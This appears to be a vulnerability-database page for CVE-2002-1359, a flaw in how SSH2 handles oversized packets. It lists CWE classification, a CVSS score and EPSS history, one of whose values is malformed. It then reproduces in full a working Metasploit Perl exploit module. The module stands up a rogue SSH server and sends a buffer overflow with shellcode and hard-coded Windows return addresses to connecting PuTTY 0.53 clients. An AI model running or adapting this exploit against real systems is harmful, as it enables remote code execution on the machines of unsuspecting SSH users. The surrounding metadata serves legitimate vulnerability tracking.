CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Multiple SSH2 servers and clients do not properly handle large packets or large fields, which may allow remote attackers to cause a denial of service or possibly execute arbitrary code via buffer overflow attacks, as demonstrated by the SSHredder SSH protocol test suite.
Improper Input Validation The product receives input or data, but it does
not validate or incorrectly validates that the input has the
properties that are required to process the data safely and
correctly.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
10
AV:N/AC:L/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
84.64%
–
–
2023-03-12
–
–
–
97.15%
–
2023-05-28
–
–
–
97.08%
–
2023-10-15
–
–
–
97.18%
–
2024-06-02
–
–
–
97.18%
–
2024-11-17
–
–
–
97.16%
–
2024-12-22
–
–
–
95.91%
–
2025-01-19
–
–
–
95.91%
–
2025-03-18
–
–
–
–
80.42%
2025-03-18
–
–
–
–
80.42,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::putty_ssh;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use POSIX;
my $advanced =
{
};
my $info =
{
'Name' => 'PuTTy.exe <= v0.53 Buffer Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'y0 [at] w00t-shell.net' ],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits a buffer overflow in the PuTTY SSH client that is triggered
through a validation error in SSH.c.
}),
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winxp', 'win2000', 'win2003' ],
'Priv' => 0,
'UserOpts' =>
{
'SSHDPORT' => [ 1, 'PORT', 'The local SSHD listener port', 22 ],
'SSHSERVER' => [ 1, 'HOST', 'The local SSHD listener host', "0.0.0.0" ],
},
'AutoOpts' => { 'EXITFUNC' => 'process' },
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
'MaxNops' => 0,
'Keys' => [ '-ws2ord', '-bind' ],
},
'Refs' =>
[
[ 'URL', 'http://www.rapid7.com/advisories/R7-0009.html' ],
[ 'CVE', '2002-1359' ],
],
'DefaultTarget' => 0,
'Targets' =>
[
[ 'Windows 2000 SP4 English', 0x77e14c29 ],
[ 'Windows XP SP2 English', 0x76b43ae0 ],
[ 'Windows 2003 SP1 English', 0x76AA679b ],
],
'Keys' => [ 'putty' ],
'DisclosureDate' => 'December 16 2002',
};
sub new
{
my $class = shift;
my $self;
$self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced,
},
@_);
return $self;
}
sub Exploit
{
my $self = shift;
my $server = IO::Socket::INET->new(
LocalHost => $self->GetVar('SSHSERVER'),
LocalPort => $self->GetVar('SSHDPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp');
my $client;
# Did the listener create fail?
if (not defined($server))
{
$self->PrintLine("[-] Failed to create local SSHD listener on " . $self->GetVar('SSHDPORT'));
return;
}
$self->PrintLine("[*] Waiting for connections to " . $self->GetVar('SSHSERVER') . ":" . $self->GetVar('SSHDPORT') . "...");
while (defined($client = $server->accept()))
{
$self->HandlePuttyClient(fd => Msf::Socket::Tcp->new_from_socket($client));
}
return;
}
sub HandlePuttyClient
{
my $self = shift;
my ($fd) = @{{@_}}{qw/fd/};
my $target = $self->Targets->[$self->GetVar('TARGET')];
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $rhost;
my $rport;
# Set the remote host information
($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
my $sploit =
"SSH-2.0-OpenSSH_3.6.1p2\r\n".
"\x00\x00\x4e\xec\x01\x14".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde".
(((((Pex::Text::AlphaNumText(64)). ",") x 30). Pex::Text::AlphaNumText(64). "\x00\x00\x07\xde") x 2).
(((Pex::Text::AlphaNumText(64)). ",") x 2). Pex::Text::AlphaNumText(21).
pack('V', $target->[1]). $self->MakeNops(10). $shellcode.
(((Pex::Text::AlphaNumText(64)). ",") x 15). Pex::Text::AlphaNumText(64). "\x00\x00\x07\xde".
(((Pex::Text::AlphaNumText(64)). ",") x 30). Pex::Text::AlphaNumText(64). "\x00\x00\x07\xde".
(((Pex::Text::AlphaNumText(64)). ",") x 21). Pex::Text::AlphaNumText(64). "\x00\x00\x07\xde".
(((((Pex::Text::AlphaNumText(64)). ",") x 30). Pex::Text::AlphaNumText(64). "\x00\x00\x07\xde") x 6).
"\x00\x00\x00\x00\x00\x00";
$self->PrintLine("[*] Client connected from $rhost:$rport...");
$fd->Send($sploit);
$self->PrintLine("[*] Sending ". length($sploit). " bytes to remote host...");
$self->Handler($fd);
$fd->Close();
}
1;
# milw0rm.com [2006-05-15]